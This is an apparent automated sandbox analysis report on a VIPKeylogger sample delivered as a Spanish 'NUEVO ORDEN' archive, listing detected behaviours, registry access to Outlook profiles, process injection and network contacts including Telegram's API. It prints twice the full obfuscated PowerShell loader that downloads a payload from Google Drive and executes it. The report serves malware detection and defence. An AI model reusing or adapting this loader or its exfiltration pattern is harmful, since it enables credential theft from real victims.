Analysis Overview
SHA256
98e999b9e6771e3f4dd54455ece73c011dea3c7f93ae9a75932b2a0a08765f25
Threat Level: Known bad
The file 22102024_1632_22102024_NUEVO ORDEN.rar was found to be: Known bad.
Malicious Activity Summary
VIPKeylogger
Blocklisted process makes network request
Checks computer location settings
Command and Scripting Interpreter: PowerShell
Accesses Microsoft Outlook profiles
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of NtCreateThreadExHideFromDebugger
Browser Information Discovery
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
outlook_office_path
outlook_win_path
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-22 16:32
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-22 16:32
Reported
2024-10-22 16:38
Platform
win10v2004-20241007-en
Max time kernel
295s
Max time network
207s
Command Line
Signatures
VIPKeylogger
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1492 wrote to memory of 2884 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1492 wrote to memory of 2884 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 392 wrote to memory of 4184 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 392 wrote to memory of 4184 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 392 wrote to memory of 4184 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 392 wrote to memory of 4184 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NUEVO ORDEN.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Projectiles Aabenlys Retshandlen Consularity #>;$acetatsilke='Uladsiggrliges';<#Indsbningers Sebaceous allometric Regalvanise Ndvendiggrer Lgkupledes #>;$Tmmerhandlers173=$Ministeren+$host.UI; function Tmema($granaterne){If ($Tmmerhandlers173) {$Overgesticulatively++;}$Skalperingen=$Tubaist+$granaterne.'Length'-$Overgesticulatively; for( $Udbringningen=5;$Udbringningen -lt $Skalperingen;$Udbringningen+=6){$Udbringningennequalness=$Udbringningen;$Formiddagstime+=$granaterne[$Udbringningen];$Unaltered='Community';}$Formiddagstime;}function Eftertragtelsen($Hopperne){ & ($Geeing) ($Hopperne);}$Priscianist=Tmema 'NormaMDoe ioTeslazTrickiBlufflPinitlOdontaCulic/Forri ';$Priscianist+=Tmema 'Alunh5Pol t.Fryse0Autar Sind,(,dmntWLimonisol angringd Su poK ranwNedsasPensi KnyttN AmorTne,fo Knuff1Insol0Bulb,.Masth0Plade; skar SlubbWEm ryiVildtn berg6Space4Nonap;Flint OverbxKrige6 Hell4 Ured;topa. NonlirTryklvUdbom:Takti1S.igb3Fi,th1 rra. Anod0Gnath) Synk EjendGSvvefeHulefcOxbowkSyereoPeori/Billy2Fi,mo0Kvase1 Bran0haver0Capta1Adjek0Andaq1Bleak WolseF overiFlorurAg ateD,skrf CemeoFructxLucro/ Cor 1 ard3Nonde1Remem. yom0 Sola ';$Skematiserer=Tmema 'triozUmi reSFiberEFlu tR R ve- uggiA Res,GSeancE Fo pNAl edTDvehj ';$Diskettefejlenes=Tmema ' Pickh ThoftRedivtPatr pTriflsFiske:Clear/ djo/ DefedTrn ar abreiSubplvB.tnaeVan s.Mar igbasseo UnwroMe amgBlythlPhotoeN.npr. Struc DestoDiscemFi et/ProabuFaldecLevul?BetaledaakaxForgepHulkiol.parrSo,iatSekle= sprdd BrndoGangrw lvinnLandil Mi.poKonvoaF,tned,ries&.otaliSche dSkiag=Par,l1RmninGSkurrcPlentrAutodPSamsspDolicsT rzeOslada9ProsuFCatalj Angu6Kurer3Tj ekA StkyjMisdeZ Beath M.dtJWichto recuJSmu.vfNondebVanreJ SougW mlasH TvinY StacTAfbrkq rmmeWAvitaAOpmunG OceawAnretVPeror ';$Datauheldenes=Tmema 'Priv >Fav t ';$Geeing=Tmema ' Cavai LepteAn ekx V ge ';$Fabriker='Rifted';$Studenterhavrens='\Realiaernes60.Svo';Eftertragtelsen (Tmema 'Misas$UnderGConcilTaranoaftalbUnforaBibl l Afst:RakkeMOverbY lmioSkovstSkeggiRou,eCE eri=Fintl$ omuletyndsNHjernv.xcer: ByggAEkskrP Uperp Dec,DStngeASuzanTPiffla Kupp+Sn,bn$Be raS adavTAkantU,aglsdBarnde .onmNSjlerTDatase SclaRTaphvherektaforhavBook.RKolosEKoinen AnkeSUnflo ');Eftertragtelsen (Tmema 'M rke$VitriGOplstl ElemoP almbb rkeA Udm.LSolen:SidetGNoegeoUdstrDUrbanh ClavJMis rePulmoRMassiT BlodevaporDLandseDy ehsAntia=,bsol$Repr.d NvneiLogjasUeg nKDem.re Filtt Abbet Esthe P.ysfP acte Sti JDublel E uiE .estNStngeeSpgelSEvang.Tillus ollpFdepulH,ghbiBetontTweyf(Dipl $HabildIn omAStorttFll,saRabb u LivshPotp.eForf lNutatD Ta ke SejrNDisbaeN,edesRekla) Staa ');Eftertragtelsen (Tmema 'Mauve[BartrNTelegEH,eretBap i.,agnasTaleneScreeRPar ivBellbiMag ecOpht,EPostrPunthaONettoiFa atNDecolT UnliMFilipadimerNfl atAIckergSgsmaEFar drFl we] U,or:Incep:opslaSCre mEQuotiCSekonuTri sRFraraIMbelftPreopyHje.tppr anR SutlOBass t MelooSopr cstj.ro IndhlParap Ur.lo=Para Sacri[SkefunFron.EDevittBl.wb.IncarSAnmareU infc H eruTeglvR KimsiCurioTFeri y LigePSilesrBilleOC efptSiddeOTipolCvolaiO HerrLHamultDubleYLevanp ExpreTular]Resis: re r:Str pTTestilJavahSepenc1 fore2T get ');$Diskettefejlenes=$Godhjertedes[0];$Besigtigelses=(Tmema 'Rygek$PotteGare dLArgumoSelenBPatriATekstlHenvi:ratlaN yliooInterNsta gmjamaieUrgamdRundiiFlettcIrresIHalvaN etaa DybfLStour=U lannM scuEOpdrtW Car - astoKortsBSo leJOmsorER cirCbogreTSte,p DioptsHyracYSaddeSBarratJo,stE Bo tmMfind.forbrNolaioe UndeTBu ts.W rwowParaseAfkbeBApomiCDalarLTh.opiFiskeEsube NSideftSnurr ');Eftertragtelsen ($Besigtigelses);Eftertragtelsen (Tmema 'Euka $Inde,NLannioPreven ntikmHoldue DeridBisatiLysgtc Li ciAlpernOlieraRehuml Meje.SemiaHFlommeDruk.aUbevgdSopraeanfrer .versKanar[Lu,pe$ aturSOpsgnkCalcaeH.adrmSp staMileatBoofhiChiffsKombie bl,erKrnkee SkygrRepor]Sukke=Skatt$GapleP irkrp essiMythosPaasecSkadeiSvumma EngknEncumiCladmsSpl,ntSubsi ');$Kodogu=Tmema 'Doupi$UndesNJawbaoGat inStvsumFerrue .hoedBrugei c,incMahani St rn Handathin lKatte.arracDS.nktoBenytwTelevnTilsml Unlaopunt a ForhdF eelFsphini KravlFor eeRrels(Bitre$BryggDFifteiPaasks entok Milje,utoftY rdetFedere Sponf,tenhe K,ndjTar ilCanaseShipbnObnoxe nachsmales,Femog$BesugW Uop.oReob oDiag l AkuppDipnea Torbc L gkkCremesAfbre)Konju ';$Woolpacks=$Myotic;Eftertragtelsen (Tmema 'ordre$Ioti gTarsiLDundeoDubbeB G unA xoplBorg,:S porG TuniRIsoleaDrivkNBovisD TffeAKompodTorcuDMoorbYKldni1kolle3Contr0 Cell= Golg(OratoTCatakeEnsidsOutstT.choe-Ph,liP DbefaAcantt.orreH Ek p Maeg $ JolawForvrO Fe.lo ortLSkja PKarinAMislyc KattkadelasMetan) Unac ');while (!$Grandaddy130) {Eftertragtelsen (Tmema 'l.ngm$ElegigFstnil Logio MacebNiella Destl Rhip:JovicFBarwaoCountrKorrim.verfy jemfnArmordN.tabeImitar FamisPropek.nderamothebTaia eZombir GrinnOverae Lsep=Ndven$Sta dtInharrUnconuWatereSster ') ;Eftertragtelsen $Kodogu;Eftertragtelsen (Tmema 'Pi.fisEksilTMus,uaDe rar Tea.TRefor-AllicSPolypl FyrseLandeEC.nospBac a indus4dir c ');Eftertragtelsen (Tmema 'Ombyg$ ftnigPerveL acuOPa ceBApol,aTrykslCovin:TransGGrundRP eceADoormNAmts DFuldsA BrandBronzdBefrayNo.co1Soste3 Kvaj0Camou=Odon ( FlsktWatchECalanSSamfutValor-Forpap Bi tASnderTBerggHAngor Catna$ IraqWInstaoR,saloRubelLGran P BeteA .estCBrendkLi,kesYppig)Lowli ') ;Eftertragtelsen (Tmema 'Ovali$Tr quGDoucel StadOAntimBKwapaaFlyveLAndri:SkridP F,onRteks iplumaS LaplN .ejliCryptVconveESubl.ANedraU C ewSVasel=D spe$EksklGUramiln.utrOBrunebVriknA ovpLPensi: KonjMCrooka pe oK Stv.rUnnasOFalliKFreeba GeneLTitindletfreR loknparchenglep+Indka+,rapp%Asyls$Cornig ,popoAntepDcatheHTidsfJ JaghEK ociR b,svT V ideReva D VadeeForbesLeuc..Trak.CFler oRingkUKarbunWing tShac ') ;$Diskettefejlenes=$Godhjertedes[$Prisniveaus];}$whiterider=322484;$Vaaset=30962;Eftertragtelsen (Tmema 'Sol v$SkabeG eriel ReciOXanthbUdkobaSl mhLRaas : OverN foruo F.rdNSpunspAfs.aoKronipYoureuUnponLPlakaAD illRDiseml SkriyInkom2 Mink3tab l7Qinta R son= ,jem Efterg Unree Dipht .rne-Dom,ncAntedo ingvnEluvitLy,ose iggnRiveoTTrans Thin$Sd,rbwShirtOKunstOBuballKhmerp Rv,raPycnoc LidekRes rsdepic ');Eftertragtelsen (Tmema 'Di.et$CuratgAttrilJoltlounadeb UhygaAdvislGains:.radmTUnralrNovatlAsphegKlarlgSjkkeeu,hamnCountdVesiceCasca Postu= Mini B evb[ RethS BasiyF.rbrsE phyt ReakeFlimmmStori.skudsCAkvaro S monArco.v OffieCrater Ufort feue] roff:Sort :VeranF MaltrAggrao jninm S asBUni,aaNominsSttere R dd6Supel4ch moS dyretNitrorBeskyiUncurnB,vgegspray( Ingb$antiaNImpreoOlam,nForsepWilysoKodakpHeim uB nsklUnvila Preirpanetlf.emtyUdrad2Nedno3Decim7B.sep)Savbl ');Eftertragtelsen (Tmema ' Stvn$OestrGUgeblLWringODommebPetreaStri,LRende:KnstnsTil iKSaag aFabrilDekupOCentrtHellitGrounEM grn Y.gl= Trum Brim[ KrhgsLeksiyOmsorS RemiTKorriEbnkevMBacte.BermmTJurisE sselx ImagTpheno.CaecieForelNM.skmC S ddoAllw dComm ISt mpN Tu bgQu nd] Scru:Haddo:Brne aaeronsWa,blcTackbIFrergicardi. Drmmg pdate yskat irgs Moo.tQuadrR NondI ShelNBenedg.igyn(Dehyd$Hug ltEquivrCretilOptagGM,rdeGClocke SubfnSejr DKogleeTrykk)bi ol ');Eftertragtelsen (Tmema 'Cribb$Nerveg steL Palao ForeBM croaAchr,lKonto: SomatWhinseSandwMObeliaTe uiDHol,eAAutopGStamheMo phN,lbowe PumisFrems= Zoof$ RumbsSyph KPreasADe.mol Aktios lvatsekt T.onmueMemor.Ek pesForivu mbreBPropeSOrgietKonk.RSmrfeIRaffuNRetteGPures( Domm$ TillwForurhBr acIBaandTPol leder aR ProgiNo.medMacroeMiliarPsych,Leges$f ickvKetasAUn,haaLizbesC imaeSnohaTCa ag)Lrred ');Eftertragtelsen $Temadagenes;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Projectiles Aabenlys Retshandlen Consularity #>;$acetatsilke='Uladsiggrliges';<#Indsbningers Sebaceous allometric Regalvanise Ndvendiggrer Lgkupledes #>;$Tmmerhandlers173=$Ministeren+$host.UI; function Tmema($granaterne){If ($Tmmerhandlers173) {$Overgesticulatively++;}$Skalperingen=$Tubaist+$granaterne.'Length'-$Overgesticulatively; for( $Udbringningen=5;$Udbringningen -lt $Skalperingen;$Udbringningen+=6){$Udbringningennequalness=$Udbringningen;$Formiddagstime+=$granaterne[$Udbringningen];$Unaltered='Community';}$Formiddagstime;}function Eftertragtelsen($Hopperne){ & ($Geeing) ($Hopperne);}$Priscianist=Tmema 'NormaMDoe ioTeslazTrickiBlufflPinitlOdontaCulic/Forri ';$Priscianist+=Tmema 'Alunh5Pol t.Fryse0Autar Sind,(,dmntWLimonisol angringd Su poK ranwNedsasPensi KnyttN AmorTne,fo Knuff1Insol0Bulb,.Masth0Plade; skar SlubbWEm ryiVildtn berg6Space4Nonap;Flint OverbxKrige6 Hell4 Ured;topa. NonlirTryklvUdbom:Takti1S.igb3Fi,th1 rra. Anod0Gnath) Synk EjendGSvvefeHulefcOxbowkSyereoPeori/Billy2Fi,mo0Kvase1 Bran0haver0Capta1Adjek0Andaq1Bleak WolseF overiFlorurAg ateD,skrf CemeoFructxLucro/ Cor 1 ard3Nonde1Remem. yom0 Sola ';$Skematiserer=Tmema 'triozUmi reSFiberEFlu tR R ve- uggiA Res,GSeancE Fo pNAl edTDvehj ';$Diskettefejlenes=Tmema ' Pickh ThoftRedivtPatr pTriflsFiske:Clear/ djo/ DefedTrn ar abreiSubplvB.tnaeVan s.Mar igbasseo UnwroMe amgBlythlPhotoeN.npr. Struc DestoDiscemFi et/ProabuFaldecLevul?BetaledaakaxForgepHulkiol.parrSo,iatSekle= sprdd BrndoGangrw lvinnLandil Mi.poKonvoaF,tned,ries&.otaliSche dSkiag=Par,l1RmninGSkurrcPlentrAutodPSamsspDolicsT rzeOslada9ProsuFCatalj Angu6Kurer3Tj ekA StkyjMisdeZ Beath M.dtJWichto recuJSmu.vfNondebVanreJ SougW mlasH TvinY StacTAfbrkq rmmeWAvitaAOpmunG OceawAnretVPeror ';$Datauheldenes=Tmema 'Priv >Fav t ';$Geeing=Tmema ' Cavai LepteAn ekx V ge ';$Fabriker='Rifted';$Studenterhavrens='\Realiaernes60.Svo';Eftertragtelsen (Tmema 'Misas$UnderGConcilTaranoaftalbUnforaBibl l Afst:RakkeMOverbY lmioSkovstSkeggiRou,eCE eri=Fintl$ omuletyndsNHjernv.xcer: ByggAEkskrP Uperp Dec,DStngeASuzanTPiffla Kupp+Sn,bn$Be raS adavTAkantU,aglsdBarnde .onmNSjlerTDatase SclaRTaphvherektaforhavBook.RKolosEKoinen AnkeSUnflo ');Eftertragtelsen (Tmema 'M rke$VitriGOplstl ElemoP almbb rkeA Udm.LSolen:SidetGNoegeoUdstrDUrbanh ClavJMis rePulmoRMassiT BlodevaporDLandseDy ehsAntia=,bsol$Repr.d NvneiLogjasUeg nKDem.re Filtt Abbet Esthe P.ysfP acte Sti JDublel E uiE .estNStngeeSpgelSEvang.Tillus ollpFdepulH,ghbiBetontTweyf(Dipl $HabildIn omAStorttFll,saRabb u LivshPotp.eForf lNutatD Ta ke SejrNDisbaeN,edesRekla) Staa ');Eftertragtelsen (Tmema 'Mauve[BartrNTelegEH,eretBap i.,agnasTaleneScreeRPar ivBellbiMag ecOpht,EPostrPunthaONettoiFa atNDecolT UnliMFilipadimerNfl atAIckergSgsmaEFar drFl we] U,or:Incep:opslaSCre mEQuotiCSekonuTri sRFraraIMbelftPreopyHje.tppr anR SutlOBass t MelooSopr cstj.ro IndhlParap Ur.lo=Para Sacri[SkefunFron.EDevittBl.wb.IncarSAnmareU infc H eruTeglvR KimsiCurioTFeri y LigePSilesrBilleOC efptSiddeOTipolCvolaiO HerrLHamultDubleYLevanp ExpreTular]Resis: re r:Str pTTestilJavahSepenc1 fore2T get ');$Diskettefejlenes=$Godhjertedes[0];$Besigtigelses=(Tmema 'Rygek$PotteGare dLArgumoSelenBPatriATekstlHenvi:ratlaN yliooInterNsta gmjamaieUrgamdRundiiFlettcIrresIHalvaN etaa DybfLStour=U lannM scuEOpdrtW Car - astoKortsBSo leJOmsorER cirCbogreTSte,p DioptsHyracYSaddeSBarratJo,stE Bo tmMfind.forbrNolaioe UndeTBu ts.W rwowParaseAfkbeBApomiCDalarLTh.opiFiskeEsube NSideftSnurr ');Eftertragtelsen ($Besigtigelses);Eftertragtelsen (Tmema 'Euka $Inde,NLannioPreven ntikmHoldue DeridBisatiLysgtc Li ciAlpernOlieraRehuml Meje.SemiaHFlommeDruk.aUbevgdSopraeanfrer .versKanar[Lu,pe$ aturSOpsgnkCalcaeH.adrmSp staMileatBoofhiChiffsKombie bl,erKrnkee SkygrRepor]Sukke=Skatt$GapleP irkrp essiMythosPaasecSkadeiSvumma EngknEncumiCladmsSpl,ntSubsi ');$Kodogu=Tmema 'Doupi$UndesNJawbaoGat inStvsumFerrue .hoedBrugei c,incMahani St rn Handathin lKatte.arracDS.nktoBenytwTelevnTilsml Unlaopunt a ForhdF eelFsphini KravlFor eeRrels(Bitre$BryggDFifteiPaasks entok Milje,utoftY rdetFedere Sponf,tenhe K,ndjTar ilCanaseShipbnObnoxe nachsmales,Femog$BesugW Uop.oReob oDiag l AkuppDipnea Torbc L gkkCremesAfbre)Konju ';$Woolpacks=$Myotic;Eftertragtelsen (Tmema 'ordre$Ioti gTarsiLDundeoDubbeB G unA xoplBorg,:S porG TuniRIsoleaDrivkNBovisD TffeAKompodTorcuDMoorbYKldni1kolle3Contr0 Cell= Golg(OratoTCatakeEnsidsOutstT.choe-Ph,liP DbefaAcantt.orreH Ek p Maeg $ JolawForvrO Fe.lo ortLSkja PKarinAMislyc KattkadelasMetan) Unac ');while (!$Grandaddy130) {Eftertragtelsen (Tmema 'l.ngm$ElegigFstnil Logio MacebNiella Destl Rhip:JovicFBarwaoCountrKorrim.verfy jemfnArmordN.tabeImitar FamisPropek.nderamothebTaia eZombir GrinnOverae Lsep=Ndven$Sta dtInharrUnconuWatereSster ') ;Eftertragtelsen $Kodogu;Eftertragtelsen (Tmema 'Pi.fisEksilTMus,uaDe rar Tea.TRefor-AllicSPolypl FyrseLandeEC.nospBac a indus4dir c ');Eftertragtelsen (Tmema 'Ombyg$ ftnigPerveL acuOPa ceBApol,aTrykslCovin:TransGGrundRP eceADoormNAmts DFuldsA BrandBronzdBefrayNo.co1Soste3 Kvaj0Camou=Odon ( FlsktWatchECalanSSamfutValor-Forpap Bi tASnderTBerggHAngor Catna$ IraqWInstaoR,saloRubelLGran P BeteA .estCBrendkLi,kesYppig)Lowli ') ;Eftertragtelsen (Tmema 'Ovali$Tr quGDoucel StadOAntimBKwapaaFlyveLAndri:SkridP F,onRteks iplumaS LaplN .ejliCryptVconveESubl.ANedraU C ewSVasel=D spe$EksklGUramiln.utrOBrunebVriknA ovpLPensi: KonjMCrooka pe oK Stv.rUnnasOFalliKFreeba GeneLTitindletfreR loknparchenglep+Indka+,rapp%Asyls$Cornig ,popoAntepDcatheHTidsfJ JaghEK ociR b,svT V ideReva D VadeeForbesLeuc..Trak.CFler oRingkUKarbunWing tShac ') ;$Diskettefejlenes=$Godhjertedes[$Prisniveaus];}$whiterider=322484;$Vaaset=30962;Eftertragtelsen (Tmema 'Sol v$SkabeG eriel ReciOXanthbUdkobaSl mhLRaas : OverN foruo F.rdNSpunspAfs.aoKronipYoureuUnponLPlakaAD illRDiseml SkriyInkom2 Mink3tab l7Qinta R son= ,jem Efterg Unree Dipht .rne-Dom,ncAntedo ingvnEluvitLy,ose iggnRiveoTTrans Thin$Sd,rbwShirtOKunstOBuballKhmerp Rv,raPycnoc LidekRes rsdepic ');Eftertragtelsen (Tmema 'Di.et$CuratgAttrilJoltlounadeb UhygaAdvislGains:.radmTUnralrNovatlAsphegKlarlgSjkkeeu,hamnCountdVesiceCasca Postu= Mini B evb[ RethS BasiyF.rbrsE phyt ReakeFlimmmStori.skudsCAkvaro S monArco.v OffieCrater Ufort feue] roff:Sort :VeranF MaltrAggrao jninm S asBUni,aaNominsSttere R dd6Supel4ch moS dyretNitrorBeskyiUncurnB,vgegspray( Ingb$antiaNImpreoOlam,nForsepWilysoKodakpHeim uB nsklUnvila Preirpanetlf.emtyUdrad2Nedno3Decim7B.sep)Savbl ');Eftertragtelsen (Tmema ' Stvn$OestrGUgeblLWringODommebPetreaStri,LRende:KnstnsTil iKSaag aFabrilDekupOCentrtHellitGrounEM grn Y.gl= Trum Brim[ KrhgsLeksiyOmsorS RemiTKorriEbnkevMBacte.BermmTJurisE sselx ImagTpheno.CaecieForelNM.skmC S ddoAllw dComm ISt mpN Tu bgQu nd] Scru:Haddo:Brne aaeronsWa,blcTackbIFrergicardi. Drmmg pdate yskat irgs Moo.tQuadrR NondI ShelNBenedg.igyn(Dehyd$Hug ltEquivrCretilOptagGM,rdeGClocke SubfnSejr DKogleeTrykk)bi ol ');Eftertragtelsen (Tmema 'Cribb$Nerveg steL Palao ForeBM croaAchr,lKonto: SomatWhinseSandwMObeliaTe uiDHol,eAAutopGStamheMo phN,lbowe PumisFrems= Zoof$ RumbsSyph KPreasADe.mol Aktios lvatsekt T.onmueMemor.Ek pesForivu mbreBPropeSOrgietKonk.RSmrfeIRaffuNRetteGPures( Domm$ TillwForurhBr acIBaandTPol leder aR ProgiNo.medMacroeMiliarPsych,Leges$f ickvKetasAUn,haaLizbesC imaeSnohaTCa ag)Lrred ');Eftertragtelsen $Temadagenes;"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.178.3:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | 69.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| JP | 132.226.8.169:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 172.67.177.134:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | 169.8.226.132.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.177.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
Files
